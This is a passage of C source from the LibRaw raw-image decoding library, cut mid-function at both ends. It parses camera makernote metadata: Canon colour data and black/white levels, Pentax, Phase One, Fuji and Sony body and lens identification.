fseek (ifp, save1+(0x0c4<<1), SEEK_SET); // offset 196 short
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
break;
// 1DmkIII / 1DSmkIII / 1DmkIV / 5DmkII
// 7D / 40D / 50D / 60D / 450D / 500D
// 550D / 1000D / 1100D
case 674: case 692: case 702: case 1227: case 1250:
case 1251: case 1337: case 1338: case 1346:
imgdata.makernotes.canon.CanonColorDataVer = 4;
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x53<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xa8<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x0e7<<1), SEEK_SET); // offset 231 short
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
if ((imgdata.makernotes.canon.CanonColorDataSubVer == 4)
|| (imgdata.makernotes.canon.CanonColorDataSubVer == 5))
{
fseek (ifp, save1+(0x2b9<<1), SEEK_SET); // offset 697 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
else if ((imgdata.makernotes.canon.CanonColorDataSubVer == 6) ||
(imgdata.makernotes.canon.CanonColorDataSubVer == 7))
{
fseek (ifp, save1+(0x2d0<<1), SEEK_SET); // offset 720 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
else if (imgdata.makernotes.canon.CanonColorDataSubVer == 9)
{
fseek (ifp, save1+(0x2d4<<1), SEEK_SET); // offset 724 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
break;
case 5120:
imgdata.makernotes.canon.CanonColorDataVer = 5; // PowerSot G10, G12, G5 X, EOS M3, EOS M5
{
fseek (ifp, save1+(0x56<<1), SEEK_SET);
if ((unique_id == 0x03970000) || // G7 X Mark II
(unique_id == 0x80000394)) // EOS M5
{
fseek(ifp, 18, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Other][c ^ (c >> 1)] = get2();
fseek(ifp, 8, SEEK_CUR);
Canon_WBpresets(8,24);
fseek(ifp, 168, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][c ^ (c >> 1)] = get2();
fseek(ifp, 24, SEEK_CUR);
Canon_WBCTpresets (2); // BCADT
fseek(ifp, 6, SEEK_CUR);
}
else
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Other][c ^ (c >> 1)] = get2();
get2();
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xba<<1), SEEK_SET);
Canon_WBCTpresets (2); // BCADT
fseek (ifp, save1+(0x108<<1), SEEK_SET); // offset 264 short
}
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
break;
case 1273: case 1275:
imgdata.makernotes.canon.CanonColorDataVer = 6; // 600D / 1200D
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x67<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xbc<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x0fb<<1), SEEK_SET); // offset 251 short
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
fseek (ifp, save1+(0x1e4<<1), SEEK_SET); // offset 484 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
break;
// 1DX / 5DmkIII / 6D / 100D / 650D / 700D / EOS M / 7DmkII / 750D / 760D
case 1312: case 1313: case 1316: case 1506:
imgdata.makernotes.canon.CanonColorDataVer = 7;
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x80<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xd5<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x114<<1), SEEK_SET); // offset 276 shorts
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
if (imgdata.makernotes.canon.CanonColorDataSubVer == 10)
{
fseek (ifp, save1+(0x1fd<<1), SEEK_SET); // offset 509 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
} else if (imgdata.makernotes.canon.CanonColorDataSubVer == 11)
{
fseek (ifp, save1+(0x2dd<<1), SEEK_SET); // offset 733 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
break;
// 5DS / 5DS R / 80D / 1300D / 5D4
case 1560: case 1592: case 1353:
imgdata.makernotes.canon.CanonColorDataVer = 8;
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x85<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0x107<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x146<<1), SEEK_SET); // offset 326 shorts
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
if (imgdata.makernotes.canon.CanonColorDataSubVer == 14) // 1300D
{
fseek (ifp, save1+(0x231<<1), SEEK_SET);
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
else
{
fseek (ifp, save1+(0x30f<<1), SEEK_SET); // offset 783 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
break;
}
fseek (ifp, save1, SEEK_SET);
}
}
void CLASS setPentaxBodyFeatures (unsigned id)
{
imgdata.lens.makernotes.CamID = id;
switch (id) {
case 0x12994:
case 0x12aa2:
case 0x12b1a:
case 0x12b60:
case 0x12b62:
case 0x12b7e:
case 0x12b80:
case 0x12b9c:
case 0x12b9d:
case 0x12ba2:
case 0x12c1e:
case 0x12c20:
case 0x12cd2:
case 0x12cd4:
case 0x12cfa:
case 0x12d72:
case 0x12d73:
case 0x12db8:
case 0x12dfe:
case 0x12e6c:
case 0x12e76:
case 0x12ef8:
case 0x12f52:
case 0x12f70:
case 0x12f71:
case 0x12fb6:
case 0x12fc0:
case 0x12fca:
case 0x1301a:
case 0x13024:
case 0x1309c:
case 0x13222:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
break;
case 0x13092:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
break;
case 0x12e08:
case 0x13010:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_645;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_MF;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_645;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_MF;
break;
case 0x12ee4:
case 0x12f66:
case 0x12f7a:
case 0x1302e:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_Q;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_Q;
break;
default:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
return;
}
void CLASS PentaxISO (ushort c)
{
int code [] = {3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 50, 100, 200, 400, 800, 1600, 3200, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278};
double value [] = {50, 64, 80, 100, 125, 160, 200, 250, 320, 400, 500, 640, 800, 1000, 1250, 1600, 2000, 2500, 3200, 4000, 5000, 6400, 8000, 10000, 12800, 16000, 20000, 25600, 32000, 40000, 51200, 64000, 80000, 102400, 128000, 160000, 204800, 50, 100, 200, 400, 800, 1600, 3200, 50, 70, 100, 140, 200, 280, 400, 560, 800, 1100, 1600, 2200, 3200, 4500, 6400, 9000, 12800, 18000, 25600, 36000, 51200};
#define numel (sizeof(code)/sizeof(code[0]))
int i;
for (i = 0; i < numel; i++) {
if (code[i] == c) {
iso_speed = value[i];
return;
}
}
if (i == numel) iso_speed = 65535.0f;
}
#undef numel
void CLASS PentaxLensInfo (unsigned id, unsigned len) // tag 0x0207
{
ushort iLensData = 0;
uchar *table_buf;
table_buf = (uchar*)malloc(MAX(len,128));
fread(table_buf, len, 1, ifp);
if ((id < 0x12b9c) ||
(((id == 0x12b9c) || // K100D
(id == 0x12b9d) || // K110D
(id == 0x12ba2)) && // K100D Super
((!table_buf[20] ||
(table_buf[20] == 0xff)))))
{
iLensData = 3;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
(((unsigned)table_buf[0]) << 8) + table_buf[1];
}
else switch (len)
{
case 90: // LensInfo3
iLensData = 13;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[1] & 0x0f) + table_buf[3]) <<8) + table_buf[4];
break;
case 91: // LensInfo4
iLensData = 12;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[1] & 0x0f) + table_buf[3]) <<8) + table_buf[4];
break;
case 80: // LensInfo5
case 128:
iLensData = 15;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[1] & 0x0f) + table_buf[4]) <<8) + table_buf[5];
break;
default:
if (id >= 0x12b9c) // LensInfo2
{
iLensData = 4;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[0] & 0x0f) + table_buf[2]) <<8) + table_buf[3];
}
}
if (iLensData)
{
if (table_buf[iLensData+9] &&
(fabs(imgdata.lens.makernotes.CurFocal) < 0.1f))
imgdata.lens.makernotes.CurFocal =
10*(table_buf[iLensData+9]>>2) * libraw_powf64(4, (table_buf[iLensData+9] & 0x03)-2);
if (table_buf[iLensData+10] & 0xf0)
imgdata.lens.makernotes.MaxAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+10] & 0xf0) >>4)/4.0f);
if (table_buf[iLensData+10] & 0x0f)
imgdata.lens.makernotes.MinAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+10] & 0x0f) + 10)/4.0f);
if (iLensData != 12)
{
switch (table_buf[iLensData] & 0x06)
{
case 0: imgdata.lens.makernotes.MinAp4MinFocal = 22.0f; break;
case 2: imgdata.lens.makernotes.MinAp4MinFocal = 32.0f; break;
case 4: imgdata.lens.makernotes.MinAp4MinFocal = 45.0f; break;
case 6: imgdata.lens.makernotes.MinAp4MinFocal = 16.0f; break;
}
if (table_buf[iLensData] & 0x70)
imgdata.lens.makernotes.LensFStops =
((float)(((table_buf[iLensData] & 0x70) >> 4) ^ 0x07)) / 2.0f + 5.0f;
imgdata.lens.makernotes.MinFocusDistance = (float)(table_buf[iLensData+3] & 0xf8);
imgdata.lens.makernotes.FocusRangeIndex = (float)(table_buf[iLensData+3] & 0x07);
if ((table_buf[iLensData+14] > 1) &&
(fabs(imgdata.lens.makernotes.MaxAp4CurFocal) < 0.7f))
imgdata.lens.makernotes.MaxAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+14] & 0x7f) -1)/32.0f);
}
else if ((id != 0x12e76) && // K-5
(table_buf[iLensData+15] > 1) &&
(fabs(imgdata.lens.makernotes.MaxAp4CurFocal) < 0.7f))
{
imgdata.lens.makernotes.MaxAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+15] & 0x7f) -1)/32.0f);
}
}
free(table_buf);
return;
}
void CLASS setPhaseOneFeatures (unsigned id) {
ushort i;
static const struct {
ushort id;
char t_model[32];
} p1_unique[] = {
// Phase One section:
{1, "Hasselblad V"},
{10, "PhaseOne/Mamiya"},
{12, "Contax 645"},
{16, "Hasselblad V"},
{17, "Hasselblad V"},
{18, "Contax 645"},
{19, "PhaseOne/Mamiya"},
{20, "Hasselblad V"},
{21, "Contax 645"},
{22, "PhaseOne/Mamiya"},
{23, "Hasselblad V"},
{24, "Hasselblad H"},
{25, "PhaseOne/Mamiya"},
{32, "Contax 645"},
{34, "Hasselblad V"},
{35, "Hasselblad V"},
{36, "Hasselblad H"},
{37, "Contax 645"},
{38, "PhaseOne/Mamiya"},
{39, "Hasselblad V"},
{40, "Hasselblad H"},
{41, "Contax 645"},
{42, "PhaseOne/Mamiya"},
{44, "Hasselblad V"},
{45, "Hasselblad H"},
{46, "Contax 645"},
{47, "PhaseOne/Mamiya"},
{48, "Hasselblad V"},
{49, "Hasselblad H"},
{50, "Contax 645"},
{51, "PhaseOne/Mamiya"},
{52, "Hasselblad V"},
{53, "Hasselblad H"},
{54, "Contax 645"},
{55, "PhaseOne/Mamiya"},
{67, "Hasselblad V"},
{68, "Hasselblad H"},
{69, "Contax 645"},
{70, "PhaseOne/Mamiya"},
{71, "Hasselblad V"},
{72, "Hasselblad H"},
{73, "Contax 645"},
{74, "PhaseOne/Mamiya"},
{76, "Hasselblad V"},
{77, "Hasselblad H"},
{78, "Contax 645"},
{79, "PhaseOne/Mamiya"},
{80, "Hasselblad V"},
{81, "Hasselblad H"},
{82, "Contax 645"},
{83, "PhaseOne/Mamiya"},
{84, "Hasselblad V"},
{85, "Hasselblad H"},
{86, "Contax 645"},
{87, "PhaseOne/Mamiya"},
{99, "Hasselblad V"},
{100, "Hasselblad H"},
{101, "Contax 645"},
{102, "PhaseOne/Mamiya"},
{103, "Hasselblad V"},
{104, "Hasselblad H"},
{105, "PhaseOne/Mamiya"},
{106, "Contax 645"},
{112, "Hasselblad V"},
{113, "Hasselblad H"},
{114, "Contax 645"},
{115, "PhaseOne/Mamiya"},
{131, "Hasselblad V"},
{132, "Hasselblad H"},
{133, "Contax 645"},
{134, "PhaseOne/Mamiya"},
{135, "Hasselblad V"},
{136, "Hasselblad H"},
{137, "Contax 645"},
{138, "PhaseOne/Mamiya"},
{140, "Hasselblad V"},
{141, "Hasselblad H"},
{142, "Contax 645"},
{143, "PhaseOne/Mamiya"},
{148, "Hasselblad V"},
{149, "Hasselblad H"},
{150, "Contax 645"},
{151, "PhaseOne/Mamiya"},
{160, "A-250"},
{161, "A-260"},
{162, "A-280"},
{167, "Hasselblad V"},
{168, "Hasselblad H"},
{169, "Contax 645"},
{170, "PhaseOne/Mamiya"},
{172, "Hasselblad V"},
{173, "Hasselblad H"},
{174, "Contax 645"},
{175, "PhaseOne/Mamiya"},
{176, "Hasselblad V"},
{177, "Hasselblad H"},
{178, "Contax 645"},
{179, "PhaseOne/Mamiya"},
{180, "Hasselblad V"},
{181, "Hasselblad H"},
{182, "Contax 645"},
{183, "PhaseOne/Mamiya"},
{208, "Hasselblad V"},
{211, "PhaseOne/Mamiya"},
{448, "Phase One 645AF"},
{457, "Phase One 645DF"},
{471, "Phase One 645DF+"},
{704, "Phase One iXA"},
{705, "Phase One iXA - R"},
{706, "Phase One iXU 150"},
{707, "Phase One iXU 150 - NIR"},
{708, "Phase One iXU 180"},
{721, "Phase One iXR"},
// Leaf section:
{333,"Mamiya"},
{329,"Universal"},
{330,"Hasselblad H1/H2"},
{332,"Contax"},
{336,"AFi"},
{327,"Mamiya"},
{324,"Universal"},
{325,"Hasselblad H1/H2"},
{326,"Contax"},
{335,"AFi"},
{340,"Mamiya"},
{337,"Universal"},
{338,"Hasselblad H1/H2"},
{339,"Contax"},
{323,"Mamiya"},
{320,"Universal"},
{322,"Hasselblad H1/H2"},
{321,"Contax"},
{334,"AFi"},
{369,"Universal"},
{370,"Mamiya"},
{371,"Hasselblad H1/H2"},
{372,"Contax"},
{373,"Afi"},
};
imgdata.lens.makernotes.CamID = id;
if (id && !imgdata.lens.makernotes.body[0]) {
for (i=0; i < sizeof p1_unique / sizeof *p1_unique; i++)
if (id == p1_unique[i].id) {
strcpy(imgdata.lens.makernotes.body,p1_unique[i].t_model);
}
}
return;
}
void CLASS parseFujiMakernotes (unsigned tag, unsigned type) {
switch (tag) {
case 0x1002: imgdata.makernotes.fuji.WB_Preset = get2(); break;
case 0x1011: imgdata.other.FlashEC = getreal(type); break;
case 0x1020: imgdata.makernotes.fuji.Macro = get2(); break;
case 0x1021: imgdata.makernotes.fuji.FocusMode = get2(); break;
case 0x1022: imgdata.makernotes.fuji.AFMode = get2(); break;
case 0x1023: imgdata.makernotes.fuji.FocusPixel[0] = get2();
imgdata.makernotes.fuji.FocusPixel[1] = get2();
break;
case 0x1034: imgdata.makernotes.fuji.ExrMode = get2(); break;
case 0x1050: imgdata.makernotes.fuji.ShutterType = get2(); break;
case 0x1400: imgdata.makernotes.fuji.FujiDynamicRange = get2(); break;
case 0x1401: imgdata.makernotes.fuji.FujiFilmMode = get2(); break;
case 0x1402: imgdata.makernotes.fuji.FujiDynamicRangeSetting = get2(); break;
case 0x1403: imgdata.makernotes.fuji.FujiDevelopmentDynamicRange = get2(); break;
case 0x140b: imgdata.makernotes.fuji.FujiAutoDynamicRange = get2(); break;
case 0x1404: imgdata.lens.makernotes.MinFocal = getreal(type); break;
case 0x1405: imgdata.lens.makernotes.MaxFocal = getreal(type); break;
case 0x1406: imgdata.lens.makernotes.MaxAp4MinFocal = getreal(type); break;
case 0x1407: imgdata.lens.makernotes.MaxAp4MaxFocal = getreal(type); break;
case 0x1422: imgdata.makernotes.fuji.ImageStabilization[0] = get2();
imgdata.makernotes.fuji.ImageStabilization[1] = get2();
imgdata.makernotes.fuji.ImageStabilization[2] = get2();
imgdata.shootinginfo.ImageStabilization = (imgdata.makernotes.fuji.ImageStabilization[0]<<9) + imgdata.makernotes.fuji.ImageStabilization[1];
break;
case 0x1431: imgdata.makernotes.fuji.Rating = get4(); break;
case 0x3820: imgdata.makernotes.fuji.FrameRate = get2(); break;
case 0x3821: imgdata.makernotes.fuji.FrameWidth = get2(); break;
case 0x3822: imgdata.makernotes.fuji.FrameHeight = get2(); break;
}
return;
}
void CLASS setSonyBodyFeatures (unsigned id) {
imgdata.lens.makernotes.CamID = id;
if ( // FF cameras
(id == 257) || // a900
(id == 269) || // a850
(id == 340) || // ILCE-7M2
(id == 318) || // ILCE-7S
(id == 350) || // ILCE-7SM2
(id == 311) || // ILCE-7R
(id == 347) || // ILCE-7RM2
(id == 306) || // ILCE-7
(id == 298) || // DSC-RX1
(id == 299) || // NEX-VG900
(id == 310) || // DSC-RX1R
(id == 344) || // DSC-RX1RM2
(id == 354) || // ILCA-99M2
(id == 294) // SLT-99, Hasselblad HV
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
}
else if ((id == 297) || // DSC-RX100
(id == 308) || // DSC-RX100M2
(id == 309) || // DSC-RX10
(id == 317) || // DSC-RX100M3
(id == 341) || // DSC-RX100M4
(id == 342) || // DSC-RX10M2
(id == 355) || // DSC-RX10M3
(id == 356) // DSC-RX100M5
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_1INCH;
}
else if (id != 002) // DSC-R1
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
}
if ( // E-mount cameras, ILCE series
(id == 302) ||
(id == 306) ||
(id == 311) ||
(id == 312) ||
(id == 313) ||
(id == 318) ||
(id == 339) ||
(id == 340) ||
(id == 346) ||
(id == 347) ||
(id == 350) ||
(id == 360)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Sony_E;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_ILCE;
}
else if ( // E-mount cameras, NEX series
(id == 278) ||
(id == 279) ||
(id == 284) ||
(id == 288) ||
(id == 289) ||
(id == 290) ||
(id == 293) ||
(id == 295) ||
(id == 296) ||
(id == 299) ||
(id == 300) ||
(id == 305) ||
(id == 307)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Sony_E;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_NEX;
}
else if ( // A-mount cameras, DSLR series
(id == 256) ||
(id == 257) ||
(id == 258) ||
(id == 259) ||
(id == 260) ||
(id == 261) ||
(id == 262) ||
(id == 263) ||
(id == 264) ||
(id == 265) ||
(id == 266) ||
(id == 269) ||
(id == 270) ||
(id == 273) ||
(id == 274) ||
(id == 275) ||
(id == 282) ||
(id == 283)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_DSLR;
}
else if ( // A-mount cameras, SLT series
(id == 280) ||
(id == 281) ||
(id == 285) ||
(id == 286) ||
(id == 287) ||
(id == 291) ||
(id == 292) ||
(id == 294) ||
(id == 303)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_SLT;
}
else if ( // A-mount cameras, ILCA series
(id == 319) ||
(id == 353) ||
(id == 354)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_ILCA;
}
else if ( // DSC
(id == 002) || // DSC-R1
(id == 297) || // DSC-RX100
(id == 298) || // DSC-RX1
(id == 308) || // DSC-RX100M2
(id == 309) || // DSC-RX10
(id == 310) || // DSC-RX1R
(id == 344) || // DSC-RX1RM2
(id == 317) || // DSC-RX100M3
(id == 341) || // DSC-RX100M4
(id == 342) || // DSC-RX10M2
(id == 355) || // DSC-RX10M3
(id == 356) // DSC-RX100M5
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_DSC;
}
return;
}
void CLASS parseSonyLensType2 (uchar a, uchar b) {
ushort lid2;
lid2 = (((ushort)a)<<8) | ((ushort)b);
if (!lid2) return;
if (lid2 < 0x100)
{
if ((imgdata.lens.makernotes.AdapterID != 0x4900) &&
(imgdata.lens.makernotes.AdapterID != 0xEF00))
{
imgdata.lens.makernotes.AdapterID = lid2;
switch (lid2) {
case 1:
case 2:
case 3:
case 6:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A;
break;
case 44:
case 78:
case 239:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
break;
}
}
}
else
imgdata.lens.makernotes.LensID = lid2;
if ((lid2 >= 50481) && (lid2 < 50500))
{
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
imgdata.lens.makernotes.AdapterID = 0x4900;
}
return;
}
#define strnXcat(buf,string) strncat(buf,string,LIM(sizeof(buf)-strbuflen(buf)-1,0,sizeof(buf)))
void CLASS parseSonyLensFeatures (uchar a, uchar b) {
ushort features;
features = (((ushort)a)<<8) | ((ushort)b);
if ((imgdata.lens.makernotes.LensMount == LIBRAW_MOUNT_Canon_EF) ||
(imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Sigma_X3F) ||
!features)
return;
imgdata.lens.makernotes.LensFeatures_pre[0] = 0;
imgdata.lens.makernotes.LensFeatures_suf[0] = 0;
if ((features & 0x0200) && (features & 0x0100)) strcpy(imgdata.lens.makernotes.LensFeatures_pre, "E");
else if (features & 0x0200) strcpy(imgdata.lens.makernotes.LensFeatures_pre, "FE");
else if (features & 0x0100) strcpy(imgdata.lens.makernotes.LensFeatures_pre, "DT");
if (!imgdata.lens.makernotes.LensFormat && !imgdata.lens.makernotes.LensMount)
{
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_FF;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A;
if ((features & 0x0200) && (features & 0x0100)) {
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E;
} else if (features & 0x0200) {
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E;
} else if (features & 0x0100) {
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_APSC;
}
}
if (features & 0x4000)
strnXcat(imgdata.lens.makernotes.LensFeatures_pre, " PZ");
if (features & 0x0008)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " G");
else if (features & 0x0004)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " ZA" );
if ((features & 0x0020) && (features & 0x0040))
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " Macro");
else if (features & 0x0020)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " STF");
else if (features & 0x0040)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " Reflex");
else if (features & 0x0080)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " Fisheye");
if (features & 0x0001)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " SSM");
else if (features & 0x0002)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " SAM");
if (features & 0x8000)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " OSS");
if (features & 0x2000)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " LE");
if (features & 0x0800)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " II");
if (imgdata.lens.makernotes.LensFeatures_suf[0] == ' ')
memmove(imgdata.lens.makernotes.LensFeatures_suf, imgdata.lens.makernotes.LensFeatures_suf+1,
strbuflen(imgdata.lens.makernotes.LensFeatures_suf)-1);
return;
}
#undef strnXcat
void CLASS process_Sony_0x940c (uchar * buf)
{
ushort lid2;
if ((imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF) &&
(imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Sigma_X3F))
{
switch (SonySubstitution[buf[0x0008]]) {
case 1:
case 5:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A;
break;
case 4:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E;
break;
}
}
lid2 = (((ushort)SonySubstitution[buf[0x000a]])<<8) |
((ushort)SonySubstitution[buf[0x0009]]);
if ((lid2 > 0) && (lid2 < 32784))
parseSonyLensType2 (SonySubstitution[buf[0x000a]], // LensType2 - Sony lens ids
SonySubstitution[buf[0x0009]]);
return;
}
void CLASS process_Sony_0x9050 (uchar * buf, unsigned id)
{
ushort lid;
if ((imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_Sony_E) &&
(imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_FixedLens))
{
if (buf[0])
imgdata.lens.makernotes.MaxAp4CurFocal =
my_roundf(libraw_powf64(2.0f, ((float)SonySubstitution[buf[0]] / 8.0 - 1.06f) / 2.0f)*10.0f) / 10.0f;
if (buf[1])
imgdata.lens.makernotes.MinAp4CurFocal =
my_roundf(libraw_powf64(2.0f, ((float)SonySubstitution[buf[1]] / 8.0 - 1.06f) / 2.0f)*10.0f) / 10.0f;
}
if (imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_FixedLens)
{
if (buf[0x3d] | buf[0x3c])
{
lid = SonySubstitution[buf[0x3d]] << 8 |
SonySubstitution[buf[0x3c]];
imgdata.lens.makernotes.CurAp =
libraw_powf64(2.0f, ((float)lid/256.0f - 16.0f) / 2.0f);
}
if (buf[0x105] &&
(imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF) &&
(imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Sigma_X3F))
imgdata.lens.makernotes.LensMount =
SonySubstitution[buf[0x105]];
if (buf[0x106])
imgdata.lens.makernotes.LensFormat =
SonySubstitution[buf[0x106]];
}
if (imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E)
{
parseSonyLensType2 (SonySubstitution[buf[0x0108]], // LensType2 - Sony lens ids
SonySubstitution[buf[0x0107]]);
}
if ((imgdata.lens.makernotes.LensID == -1) &&
(imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Minolta_A) &&
(buf[0x010a] | buf[0x0109]))
{
imgdata.lens.makernotes.LensID = // LensType - Minolta/Sony lens ids
SonySubstitution[buf[0x010a]] << 8 |
SonySubstitution[buf[0x0109]];
if ((imgdata.lens.makernotes.LensID > 0x4900) &&
(imgdata.lens.makernotes.LensID <= 0x5900))
{
imgdata.lens.makernotes.AdapterID = 0x4900;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
